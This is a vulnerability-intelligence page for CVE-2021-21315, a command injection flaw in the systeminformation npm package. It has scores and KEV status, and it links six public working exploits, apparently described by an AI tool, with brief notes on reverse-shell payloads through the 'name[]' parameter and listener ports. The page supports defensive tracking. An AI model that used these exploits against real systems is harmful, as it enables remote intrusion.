CVE-2021-21315

HIGH KEV NUCLEI LAB

systeminformation < 5.3.1 - OS Command Injection via Service Parameter Handling

Title source: llm
STIX 2.1

Exploitation Summary

CVE-2021-21315 is actively exploited and listed in the CISA Known Exploited Vulnerabilities (KEV) catalog, added January 18, 2022. EIP tracks 6 public exploits from researchers including ForbiddenProgrammer, alikarimi999, G01d3nW01f. A Nuclei detection template is also available.

AI-analyzed exploit summary This repository contains a functional Proof of Concept (PoC) for CVE-2021-21315, demonstrating a command injection vulnerability in the 'systeminformation' npm package. The exploit leverages improper sanitization of array inputs to execute arbitrary commands on the target system.

Description

The System Information Library for Node.JS (npm package "systeminformation") is an open source collection of functions to retrieve detailed hardware, system and OS information. In systeminformation before version 5.3.1 there is a command injection vulnerability. Problem was fixed in version 5.3.1. As a workaround instead of upgrading, be sure to check or sanitize service parameters that are passed to si.inetLatency(), si.inetChecksite(), si.services(), si.processLoad() ... do only allow strings, reject any arrays. String sanitation works as expected.

Exploits (6)

nomisec WORKING POC 159 stars
by ForbiddenProgrammer · remote
https://github.com/ForbiddenProgrammer/CVE-2021-21315-PoC

This repository contains a functional Proof of Concept (PoC) for CVE-2021-21315, demonstrating a command injection vulnerability in the 'systeminformation' npm package. The exploit leverages improper sanitization of array inputs to execute arbitrary commands on the target system.

Classification
Working Poc 95%
Attack Type
Rce
Complexity
Trivial
Reliability
Reliable
Target: systeminformation npm package (versions before 5.3.1)
No auth needed
Prerequisites: Target system running a vulnerable version of the 'systeminformation' package · Network access to the target system
devstral-2 · analyzed Feb 18, 2026 Full analysis →
nomisec WORKING POC 4 stars
by alikarimi999 · remote
https://github.com/alikarimi999/CVE-2021-21315

This repository contains a functional exploit for CVE-2021-21315, a command injection vulnerability in the 'systeminformation' npm package. The exploit crafts a malicious URL with a base64-encoded reverse shell payload and sends it to the target, triggering remote code execution.

Classification
Working Poc 95%
Attack Type
Rce
Complexity
Trivial
Reliability
Reliable
Target: systeminformation npm package (versions before 5.3.1)
No auth needed
Prerequisites: Target application using vulnerable 'systeminformation' package · Network access to the target
devstral-2 · analyzed Feb 18, 2026 Full analysis →
nomisec WORKING POC 1 stars
by G01d3nW01f · poc
https://github.com/G01d3nW01f/CVE-2021-21315

This repository contains a functional Rust-based exploit for CVE-2021-21315, which crafts a reverse shell payload encoded in base64 and URL-encoded to target a vulnerable API endpoint. The exploit sends the payload via HTTP request to achieve remote code execution.

Classification
Working Poc 95%
Attack Type
Rce
Complexity
Moderate
Reliability
Reliable
Target: Unknown (CVE-2021-21315 likely affects a specific API endpoint)
No auth needed
Prerequisites: Network access to the target API endpoint · Listener set up to catch the reverse shell
devstral-2 · analyzed Feb 18, 2026 Full analysis →
gitlab WORKING POC
by securitystuffbackup · poc
https://gitlab.com/securitystuffbackup/CVE-2021-21315-PoC

This repository contains a functional PoC for CVE-2021-21315, demonstrating a command injection vulnerability in the 'systeminformation' npm package. The exploit leverages improper sanitization of array inputs to execute arbitrary commands via the `si.services()` function.

Classification
Working Poc 95%
Attack Type
Rce
Complexity
Trivial
Reliability
Reliable
Target: systeminformation npm package (versions < 5.3.1)
No auth needed
Prerequisites: Node.js environment with vulnerable 'systeminformation' package installed
devstral-2 · analyzed Feb 23, 2026 Full analysis →
nomisec WORKING POC
by xMohamed0 · poc
https://github.com/xMohamed0/CVE-2021-21315-POC

This repository contains a functional exploit PoC for CVE-2021-21315, targeting a command injection vulnerability in the Node.js npm package 'systeminformation'. The exploit sends a crafted HTTP request to execute a reverse shell via a command injection in the 'name[]' parameter.

Classification
Working Poc 95%
Attack Type
Rce
Complexity
Trivial
Reliability
Reliable
Target: Node.js npm package 'systeminformation' (versions before 5.3.1)
No auth needed
Prerequisites: Target application using vulnerable 'systeminformation' package · Network connectivity to the target · Listener set up on attacker's machine (port 4242)
devstral-2 · analyzed Feb 18, 2026 Full analysis →
nomisec WORKING POC
by MazX0p · remote
https://github.com/MazX0p/CVE-2021-21315-exploit

The repository contains a functional Python exploit for CVE-2021-21315, targeting the 'systeminformation' npm package. It leverages command injection via a crafted API request to achieve remote code execution (RCE) by spawning a reverse shell.

Classification
Working Poc 95%
Attack Type
Rce
Complexity
Trivial
Reliability
Reliable
Target: systeminformation npm package (Node.js)
No auth needed
Prerequisites: Target with vulnerable 'systeminformation' package · Network connectivity to the target · Listener set up on attacker's machine (e.g., netcat on port 4242)
devstral-2 · analyzed Feb 18, 2026 Full analysis →

Nuclei Templates (1)

Node.JS System Information Library <5.3.1 - Remote Command Injection
HIGHby pikpikcu

References (6)

Core 6

Scores

CVSS v3 7.1
EPSS 0.9396
EPSS Percentile 99.9%
Attack Vector LOCAL
CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N

CISA SSVC

Vulnrichment
Exploitation active
Automatable no
Technical Impact partial

Lab Environment

COMMUNITY
Community Lab
docker pull alikarimi999/cve-2021-21315
+3 more repos

Details

CISA KEV 2022-01-18
VulnCheck KEV 2021-06-01
InTheWild.io 2021-07-01
ENISA EUVD EUVD-2021-0527
CWE
CWE-78
Status published
Products (3)
apache/cordova 10.0.0
npm/systeminformation 0 - 5.3.1npm
systeminformation/systeminformation < 5.3.1
Published Feb 16, 2021
KEV Added Jan 18, 2022
Tracked Since Feb 18, 2026